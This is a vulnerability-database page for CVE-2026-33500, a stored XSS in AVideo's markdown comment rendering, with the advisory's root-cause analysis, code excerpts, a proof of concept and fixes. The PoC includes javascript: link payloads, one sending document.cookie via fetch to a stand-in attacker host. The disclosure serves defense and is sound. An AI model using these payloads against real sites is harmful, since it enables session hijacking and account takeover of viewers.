Skip to main content

PHP CVE-2026-33500

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-20 https://github.com/WWBN/AVideo GHSA-72h5-39r7-r26j
5.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 20, 2026 - 21:01 vuln.today
CVE Published
Mar 20, 2026 - 20:56 nvd
MEDIUM 5.4

DescriptionGitHub Advisory

Summary

The fix for CVE-2026-27568 (GHSA-rcqw-6466-3mv7) introduced a custom ParsedownSafeWithLinks class that sanitizes raw HTML <a> and <img> tags in comments, but explicitly disables Parsedown's safeMode. This creates a bypass: markdown link syntax [text](javascript:alert(1)) is processed by Parsedown's inlineLink() method, which does not go through the custom sanitizeATag() sanitization (that only handles raw HTML tags). With safeMode disabled, Parsedown's built-in javascript: URI filtering (sanitiseElement()/filterUnsafeUrlInAttribute()) is also inactive. An attacker can inject stored XSS via comment markdown links.

Details

The original fix (commit ade348ed6) enabled setSafeMode(true), which activated Parsedown's built-in URL scheme filtering. This was then replaced by commit f13587c59 with a custom approach that turned safeMode back off:

objects/functionsSecurity.php:442-446 - safeMode disabled:

php
function markDownToHTML($text) {
    $parsedown = new ParsedownSafeWithLinks();
    $parsedown->setSafeMode(false);   // line 445 - disables Parsedown's built-in javascript: filtering
    $parsedown->setMarkupEscaped(false);
    $html = $parsedown->text($text);

ParsedownSafeWithLinks (lines 349-440) overrides blockMarkup() and inlineMarkup() to sanitize raw HTML <a> tags via sanitizeATag(), which whitelist-checks the URL scheme:

php
// sanitizeATag() at line 360 - only allows http(s), mailto, /,
#
if (preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $url)) {
    $href = ' href="' . htmlspecialchars($url, ENT_QUOTES) . '"';
}

However, this sanitization only runs for raw HTML <a> tags processed through inlineMarkup(). Markdown-syntax links ([text](url)) are handled by Parsedown's core inlineLink() method (vendor/erusev/parsedown/Parsedown.php:1258), which constructs an element array and passes it to element().

vendor/erusev/parsedown/Parsedown.php:1470-1475 - sanitiseElement only runs when safeMode is true:

php
protected function element(array $Element)
{
    if ($this->safeMode)        // false - so sanitiseElement() is never called
    {
        $Element = $this->sanitiseElement($Element);
    }

sanitiseElement() would have called filterUnsafeUrlInAttribute() which replaces : with %3A for non-whitelisted schemes like javascript:, but it is never invoked.

Data flow:

  1. User posts comment containing [Click here](javascript:alert(document.cookie))
  2. xss_esc() applies htmlspecialchars() - no HTML special chars exist in the payload, stored unchanged
  3. On retrieval, xss_esc_back() reverses encoding (no-op), then markDownToHTML() converts markdown to <a href="javascript:alert(document.cookie)">Click here</a>
  4. Result stored in commentWithLinks (objects/comment.php:420)
  5. Rendered directly in DOM via template at view/videoComments_template.php:15: <p>{commentWithLinks}</p>

PoC

  1. Log in as any user with comment permission
  2. Navigate to any video page
  3. Post a comment with the following markdown:
[Click here for more info](javascript:alert(document.cookie))
  1. The comment is saved and rendered. Any user viewing the video sees "Click here for more info" as a clickable link
  2. Clicking the link executes alert(document.cookie) in the victim's browser context

For session hijacking:

[See related video](javascript:fetch('https://attacker.example/steal?c='+document.cookie))

Impact

  • Session hijacking: Attacker can steal session cookies of any user (including admins) who clicks the comment link, leading to full account takeover
  • Scope change (S:C): The XSS executes in the context of the viewing user's session, crossing the trust boundary from the attacker's low-privilege comment context
  • Persistence: The payload is stored in the database and triggers for every user who views the page and clicks the link
  • UI:R required: The victim must click the link, which limits the severity vs. auto-executing XSS

Recommended Fix

Override inlineLink() in ParsedownSafeWithLinks to apply URL scheme filtering to markdown-generated links:

php
class ParsedownSafeWithLinks extends Parsedown
{
    // ... existing code ...

    protected function inlineLink($Excerpt)
    {
        $Link = parent::inlineLink($Excerpt);

        if ($Link === null) {
            return null;
        }

        $href = $Link['element']['attributes']['href'] ?? '';

        // Apply the same whitelist as sanitizeATag: only allow http(s), mailto, relative, anchors
        if ($href !== '' && !preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $href)) {
            $Link['element']['attributes']['href'] = '';
        }

        return $Link;
    }
}

Alternatively, re-enable safeMode(true) and find a different approach to allow <a> and <img> tags (e.g., post-processing the safe output to re-inject whitelisted tags).

AnalysisAI

A stored cross-site scripting (XSS) vulnerability exists in AVideo's comment markdown processing, where the fix for a prior XSS issue (CVE-2026-27568) inadvertently disabled Parsedown's safe mode while implementing incomplete custom sanitization. An attacker with comment posting privileges can inject malicious JavaScript via markdown link syntax (e.g., [text](javascript:alert(1))) that executes in the browser context of any user viewing the comment, enabling session hijacking and account takeover. A working proof-of-concept exists and the vulnerability affects all versions of WWBN AVideo using the vulnerable ParsedownSafeWithLinks class (pkg:composer/wwbn_avideo).

Technical ContextAI

The vulnerability stems from improper remediation of CWE-79 (Improper Neutralization of Input During Web Page Generation) in the Parsedown markdown library as implemented by AVideo. Parsedown is a PHP markdown parser that normally provides URL scheme filtering through its safeMode feature, which calls sanitiseElement() to block dangerous protocols like javascript:, data:, and vbscript:. AVideo's custom ParsedownSafeWithLinks class (objects/functionsSecurity.php) overrides blockMarkup() and inlineMarkup() to sanitize raw HTML <a> tags via whitelist regex, but crucially disables safeMode(false) in the markDownToHTML() function. This means markdown-syntax links processed by Parsedown's core inlineLink() method bypass the custom sanitizeATag() logic and never reach sanitiseElement(), leaving javascript: URIs unfiltered. The affected product is identified via CPE pkg:composer/wwbn_avideo and the vulnerability chain involves the comment storage (xss_esc/xss_esc_back) and rendering pipeline (view/videoComments_template.php).

RemediationAI

Apply the vendor's security patch immediately by updating AVideo to the patched version released in response to GHSA-72h5-39r7-r26j (see https://github.com/WWBN/AVideo/security/advisories/GHSA-72h5-39r7-r26j for specific version details). The recommended code-level fix is to override the inlineLink() method in ParsedownSafeWithLinks to apply the same URL scheme whitelist (http(s)://, mailto:, /, #) to markdown-generated links before they are rendered, ensuring javascript: and other dangerous protocols are stripped. Alternatively, re-enable safeMode(true) in markDownToHTML() and refactor the custom sanitization to work alongside Parsedown's built-in filtering rather than replacing it. As a temporary mitigation pending patching, disable comment markdown processing entirely or strip markdown link syntax from comments via content policy, though this degrades user experience. Additionally, implement a Content Security Policy (CSP) header with script-src 'self' to reduce XSS impact even if a payload executes.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33500 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy